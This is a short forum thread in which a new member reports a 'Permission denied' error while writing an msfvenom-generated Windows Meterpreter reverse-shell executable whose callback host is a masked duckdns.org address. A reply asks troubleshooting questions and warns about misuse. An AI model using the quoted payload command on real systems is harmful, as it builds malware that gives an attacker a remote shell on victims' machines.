Permission Denied

DarkOxyGen

New Member
Joined
Jul 27, 2021
Messages
2
Reaction score
0
Credits
24
I need help. when i write this code i can't access desktop. msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=****.duckdns.org LPORT=**** -f exe > /root/Desktop/maceradg.exe

sh: 1: cannot create /root/Desktop/maceradg.exe: Permission denied
 

Attachments

  • Screenshot_641.png
    Screenshot_641.png
    51.7 KB · Views: 363


Two Three things.
  1. Are you attempting to run the Windows binary on Linux? (it's an exe file which suggest it's a Windows binary)
  2. Did you change the permissions of the application to be executable?
  3. Careful with that tool. It can lead to trouble if you don't know what you're doing or your intentions aren't good.
 

Staff online


Top